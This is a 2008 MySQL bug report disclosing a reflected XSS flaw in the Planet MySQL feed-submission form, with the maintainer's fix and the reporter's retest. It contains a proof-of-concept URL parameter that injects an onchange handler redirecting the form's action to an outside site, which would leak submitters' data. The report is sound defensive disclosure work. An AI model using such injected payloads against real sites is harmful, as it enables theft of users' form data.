Bug #35033 Planetmysql submission form vulnerable to non-persistent XSS
Submitted: 4 Mar 2008 13:25 Modified: 4 Mar 2008 16:39
Reporter: Roland Bouman Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Websites: MySQLForge Severity:S2 (Serious)
Version: OS:Any
Assigned to: CPU Architecture:Any

[4 Mar 2008 13:25] Roland Bouman 
Description:
The page

http://www.planetmysql.org/newfeed.php

is vulnerable to XSS.

The parameters can be used to inject html/script and allow whoever is offering the link to place arbitrary content on the page. 

This is a security risk as the unsuspecting user will believe all content originates from a location that is trusted.

How to repeat:
POC:

http://www.planetmysql.org/newfeed.php?new_feed_url=http%3A%2F%2F&new_feed_language=&new_f...

Look at the parameter 

new_feed_author=%22%20onchange=%22this.form.action='http://www.yahoo.com/';%22/%3E%3Cspan%20id=%22

This inserts an onchange handler to the author field in the form. 
The onchange handler modifies the "action" attribute of the form.
When submitting the form you will be sending the form data to yahoo.com.

Of course you can put whatever you like in there. In this case this would compromise the submitters email address.

In a more insidious scenario, the hacker could inject a poll or a contest or even a update profile link or whatever and harvest data of a more sensitive nature.

Suggested fix:
Make sure that when *outputting* the paramters, the content is escaped using HTML escaping (htmlentities should do the trick)
[4 Mar 2008 14:21] Lenz Grimmer 
Thanks for the report!
[4 Mar 2008 14:26] Lenz Grimmer 
Roland, I commited a fix and updated the website. Can you please retest? Thanks!
[4 Mar 2008 14:39] Roland Bouman 
I can still inject html.

The inputs look ok. but there is a 'helpful' message to inform me that the email adres is invalid, and that reports back the invalid email address. I mean this one

<div class="feedcontent">
<h3>"Invalid email address '"/>'" 

etc

http://www.planetmysql.org/newfeed.php?new_feed_url=%27&new_feed_language=&new_feed_author...

My Personal opinion is that the server side should check these things, obviously. But informing the user is more like a convenience feature that I would place at the client side where possible. 

You can check for an email address using offline javascript, as you can use regular expression matches.

That said - I think it is acceptable to simply not report back the invalid email address.
[4 Mar 2008 16:39] Lenz Grimmer 
Thanks for the feedback, I consider the case closed for now and remove the "private" flag from the report.